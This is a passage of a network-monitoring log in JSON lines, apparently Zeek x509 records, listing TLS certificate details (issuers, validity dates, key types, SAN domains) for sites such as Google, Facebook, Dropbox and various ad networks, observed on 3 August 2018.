Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FzAEFy4WiLYK0rPRXa","certificate.version":3,"certificate.serial":"88BBA5FF112ABC1D660A0F80145DD069","certificate.subject":"CN=*.revsci.net,OU=Secure Link SSL Wildcard,OU=Network Solutions L.L.C.,O=AudienceScience Inc.,L=Bellevue,ST=WA,C=US","certificate.issuer":"CN=Network Solutions Certificate Authority,O=Network Solutions L.L.C.,C=US","certificate.not_valid_before":"2011-11-23T08:00:00.000000Z","certificate.not_valid_after":"2015-11-24T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.revsci.net"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FYYaex3BaRmoP6YwD6","certificate.version":3,"certificate.serial":"10E776E8A65A6E377E050306D43C25EA","certificate.subject":"CN=Network Solutions Certificate Authority,O=Network Solutions L.L.C.,C=US","certificate.issuer":"CN=UTN-USERFirst-Hardware,OU=http://www.usertrust.com,O=The USERTRUST Network,L=Salt Lake City,ST=UT,C=US","certificate.not_valid_before":"2006-04-10T07:00:00.000000Z","certificate.not_valid_after":"2020-05-30T17:48:38.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.152713Z","id":"FbFQBB1YlpZwIYhYXe","certificate.version":3,"certificate.serial":"5A0000CB75D450E463EA5CE0B300010000CB75","certificate.subject":"CN=api.skype.com","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-17T23:35:14.000000Z","certificate.not_valid_after":"2017-03-16T23:35:14.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["api.skype.com"]} +{"ts":"2018-08-03T23:39:01.152713Z","id":"FB8KGY1CWwKfYQaghe","certificate.version":3,"certificate.serial":"0727AA47","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-05-08T00:04:09.000000Z","certificate.not_valid_after":"2018-05-08T00:03:30.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.066785Z","id":"F3EoIe1VFptsU2nHc","certificate.version":3,"certificate.serial":"0559086565C1523E2453C13561F4D68A","certificate.subject":"CN=*.facebook.com,O=Facebook\u005c, Inc.,L=Menlo Park,ST=CA,C=US","certificate.issuer":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2015-04-10T07:00:00.000000Z","certificate.not_valid_after":"2015-10-14T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.facebook.com","facebook.com","*.fb.com","*.fbsbx.com","*.fbcdn.net","*.xx.fbcdn.net","*.xy.fbcdn.net","fb.com","*.facebookcorewwwi.onion","facebookcorewwwi.onion","*.fbcdn23dssr3jqnq.onion","fbcdn23dssr3jqnq.onion","*.fbsbx2q4mvcl63pw.onion","fbsbx2q4mvcl63pw.onion","*.m.facebook.com","*.messenger.com","messenger.com","*.m.facebookcorewwwi.onion","m.facebookcorewwwi.onion","*.xx.fbcdn23dssr3jqnq.onion","xx.fbcdn23dssr3jqnq.onion","*.xy.fbcdn23dssr3jqnq.onion","xy.fbcdn23dssr3jqnq.onion","*.xz.fbcdn.net","xz.fbcdn.net","*.xz.fbcdn23dssr3jqnq.onion","xz.fbcdn23dssr3jqnq.onion"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.066785Z","id":"FIuanD4PTBEuo7B4P4","certificate.version":3,"certificate.serial":"0A5F114D035B179117D2EFD4038C3F3B","certificate.subject":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2008-04-02T19:00:00.000000Z","certificate.not_valid_after":"2022-04-03T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.081892Z","id":"FoZF4p2LamyUIvU8fb","certificate.version":3,"certificate.serial":"0917F66E52542E8039D3E11B4A387F34","certificate.subject":"CN=versioncheck.addons.mozilla.org,O=Mozilla Foundation,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","certificate.not_valid_before":"2015-02-02T08:00:00.000000Z","certificate.not_valid_after":"2017-02-06T20:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["versioncheck.addons.mozilla.org","versioncheck-bg.addons.mozilla.org","services.addons.mozilla.org","pyrepo.addons.mozilla.org"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.081892Z","id":"Fb2hYA34IJsBzyNAA3","certificate.version":3,"certificate.serial":"01FDA3EB6ECA75C888438B724BCFBC91","certificate.subject":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-03-08T20:00:00.000000Z","certificate.not_valid_after":"2023-03-08T20:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.152606Z","id":"FRpzfN2BPaUxRkhQs9","certificate.version":3,"certificate.serial":"5A0000BEC4AE36CB2E0B7F4B4300010000BEC4","certificate.subject":"CN=*.vo.msecnd.net","certificate.issuer":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2015-03-07T08:17:34.000000Z","certificate.not_valid_after":"2017-03-06T08:17:34.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.vo.msecnd.net","*.adn.azureedge.net","*.ads2.msads.net","*.aspnetcdn.com","*.azurecomcdn.net","*.azureedge.net","*.azureedge-test.net","*.cdn.skype.com","*.cdn.skype.net","*.cmsresources.windowsphone.com","*.cmsresources.windowsphone-int.com","*.dev.skype.com","*.fms.azureedge.net","*.microsoft-sbs-domains.com","*.secure.skypeassets.com","*.secure.skypeassets.net","*.wac.azureedge.net","*.wpc.azureedge.net","ajax.microsoft.com","cdnads.msads.net","cdn-resources.windowsphone.com","cdn-resources-beta.windowsphone.com","ecnads1.msn.com","iecvlist.microsoft.com","images-cms-pn.windowsphone-int.com","images-cms-tst.windowsphone-int.com","lumiahelptipscdn.microsoft.com","lumiahelptipscdnqa.microsoft.com","lumiahelptipsmscdn.microsoft.com","lumiahelptipsmscdnqa.microsoft.com","montage.msn.com","mscrl.microsoft.com","r20swj13mr.microsoft.com","*.streaming.mediaservices.windows.net","*.origin.mediaservices.windows.net","download.sysinternals.com"]} +{"ts":"2018-08-03T23:39:01.152606Z","id":"FqYOEeXx57XYIQ2U9","certificate.version":3,"certificate.serial":"0727AA47","certificate.subject":"CN=Microsoft IT SSL SHA2,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-05-08T00:04:09.000000Z","certificate.not_valid_after":"2018-05-08T00:03:30.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.152606Z","id":"F6pP634k3VKE7LmBAk","certificate.version":3,"certificate.serial":"020000B9","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2000-05-13T01:46:00.000000Z","certificate.not_valid_after":"2025-05-13T06:59:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.117978Z","id":"FNUrvo3kZJfPUZAin3","certificate.version":3,"certificate.serial":"01923786AAB1F43996A13ACD43DA88C3","certificate.subject":"CN=client-cf.dropbox.com,O=Dropbox\u005c, Inc,L=San Francisco,ST=California,C=US","certificate.issuer":"CN=DigiCert SHA2 High Assurance Server CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2014-06-27T07:00:00.000000Z","certificate.not_valid_after":"2017-07-07T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["client-cf.dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.117978Z","id":"F0b1O3110R6WyRvqQ6","certificate.version":3,"certificate.serial":"04E1E7A4DC5CF2F36DC02B42B85D159F","certificate.subject":"CN=DigiCert SHA2 High Assurance Server CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-10-22T19:00:00.000000Z","certificate.not_valid_after":"2028-10-22T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.061343Z","id":"FBVo0y457rrHxItz23","certificate.version":3,"certificate.serial":"03F93247476E47","certificate.subject":"CN=*.dropbox.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-04-11T01:31:12.000000Z","certificate.not_valid_after":"2016-12-11T09:49:46.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.dropbox.com","dropbox.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.061343Z","id":"F8rmYY1KzGy2JR8QIj","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.061343Z","id":"FJ6aex4GTZ9L3DrU3c","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.149389Z","id":"FWVVcs4pmuyMZyhCfl","certificate.version":3,"certificate.serial":"5459A3657F1C39925E6529611FEDAECC","certificate.subject":"CN=*.adnxs.com,O=AppNexus\u005c, Inc.,L=New York,ST=New York,C=US","certificate.issuer":"CN=GeoTrust SSL CA - G2,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2014-04-11T07:00:00.000000Z","certificate.not_valid_after":"2016-04-11T06:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.adnxs.com","adnxs.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.149389Z","id":"FVSy4v3le04Yldin07","certificate.version":3,"certificate.serial":"023A63","certificate.subject":"CN=GeoTrust SSL CA - G2,O=GeoTrust Inc.,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2012-08-28T03:40:40.000000Z","certificate.not_valid_after":"2022-05-21T03:40:40.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.149389Z","id":"FKCAa247QhsfUF78si","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.164535Z","id":"FFoIeURa9mNEOK0bh","certificate.version":3,"certificate.serial":"6B70469241B9EC07","certificate.subject":"CN=*.googleusercontent.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:43:51.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.googleusercontent.com","*.blogspot.com","*.bp.blogspot.com","*.commondatastorage.googleapis.com","*.doubleclickusercontent.com","*.ggpht.com","*.googledrive.com","*.googlesyndication.com","*.sandbox.googleusercontent.com","*.storage.googleapis.com","blogspot.com","bp.blogspot.com","commondatastorage.googleapis.com","doubleclickusercontent.com","ggpht.com","googledrive.com","googleusercontent.com","static.panoramio.com.storage.googleapis.com","storage.googleapis.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.164535Z","id":"FTy8cW1f6uQUkeyTF7","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.164535Z","id":"FURdkSkB7m0GkM6Zc","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.164535Z","id":"FMkWpV3zYpwwcKPaUi","certificate.version":3,"certificate.serial":"0C089AEB077DF4B7137F1099AE84F755DB49DE24","certificate.subject":"CN=*.scorecardresearch.com,OU=OSE,O=TMRG\u005c, Inc.,L=Reston,ST=VA,C=US","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2014-10-16T04:04:12.000000Z","certificate.not_valid_after":"2015-10-16T04:04:07.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.scorecardresearch.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.164535Z","id":"Fq1jgOcP5CEArnisd","certificate.version":3,"certificate.serial":"0727A46A","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:32:45.000000Z","certificate.not_valid_after":"2021-04-02T21:31:39.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.164535Z","id":"FSzUVB4VvWL5yFYDNb","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.165044Z","id":"Fs4Hgk4R0SrAP2zpBl","certificate.version":3,"certificate.serial":"215415407EB2BA0714DBFA94025DAF13897651FE","certificate.subject":"CN=*.betrad.com,OU=IT,O=Evidon Inc,L=New York,ST=NY,C=US","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2015-02-24T07:56:04.000000Z","certificate.not_valid_after":"2016-02-24T07:56:01.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.betrad.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FCLaV228o54tFWTTFh","certificate.version":3,"certificate.serial":"0727A46A","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:32:45.000000Z","certificate.not_valid_after":"2021-04-02T21:31:39.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.165044Z","id":"Frrjld2zTlzx5TmNc","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FJXkRM7LHiPqRkQif","certificate.version":3,"certificate.serial":"020BC13FA6236629961019C95D6CB4EF","certificate.subject":"CN=ad.yieldmanager.com,OU=Information Technology,O=Yahoo Inc.,L=Sunnyvale,ST=California,C=US","certificate.issuer":"CN=VeriSign Class 3 Secure Server CA - G3,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2015-03-11T07:00:00.000000Z","certificate.not_valid_after":"2016-03-11T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.ads.yahoo.com","ad.interclick.com","ad.rmxads.com","ad.yieldmanager.com","ads.bluelithium.com","ads.yahoo.com","bap.yieldmanager.com","cookiex.ngd.yahoo.com","optimizedby.rmxads.com","rm.yieldmanager.com","ui.ad.yieldmanager.com","ui.ads.yahoo.com","yahoo.yieldmanager.com","ycpi.ad.yieldmanager.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.125873Z","id":"FhZK4z1DCkbVsQdVog","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.151147Z","id":"Fc24nc346jOKl5k5l9","certificate.version":3,"certificate.serial":"5CC17E9B9B4933FE","certificate.subject":"CN=*.doubleclick.net,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:11:33.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.doubleclick.net","*.2mdn.net","*.au.doubleclick.net","*.cc-dt.com","*.de.doubleclick.net","*.doubleclick.com","*.fls.doubleclick.net","*.fr.doubleclick.net","*.jp.doubleclick.net","*.uk.doubleclick.net","ad.mo.doubleclick.net","doubleclick.net"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.151147Z","id":"FrNOul3S7W8e3Ug21d","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.151147Z","id":"F42pOC2J4Z7Rytiyh6","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FrEvEy3XdH1MD1mQS6","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FBLx79dTQNizFMzlg","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.166295Z","id":"F009QA4FSrWnYfrTt3","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FgMw103sezly67xaWe","certificate.version":3,"certificate.serial":"1B26CE2F01E6F687EA87D3E6C1AE06B5","certificate.subject":"CN=*.scorecardresearch.com,OU=COMODO SSL Wildcard,OU=Domain Control Validated","certificate.issuer":"CN=COMODO RSA Domain Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB","certificate.not_valid_before":"2014-10-24T07:00:00.000000Z","certificate.not_valid_after":"2015-12-11T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.scorecardresearch.com","scorecardresearch.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FMmq8k4AjdfEcGr1U","certificate.version":3,"certificate.serial":"01","certificate.subject":"CN=AddTrust External CA Root,OU=AddTrust External TTP Network,O=AddTrust AB,C=SE","certificate.issuer":"CN=AddTrust External CA Root,OU=AddTrust External TTP Network,O=AddTrust 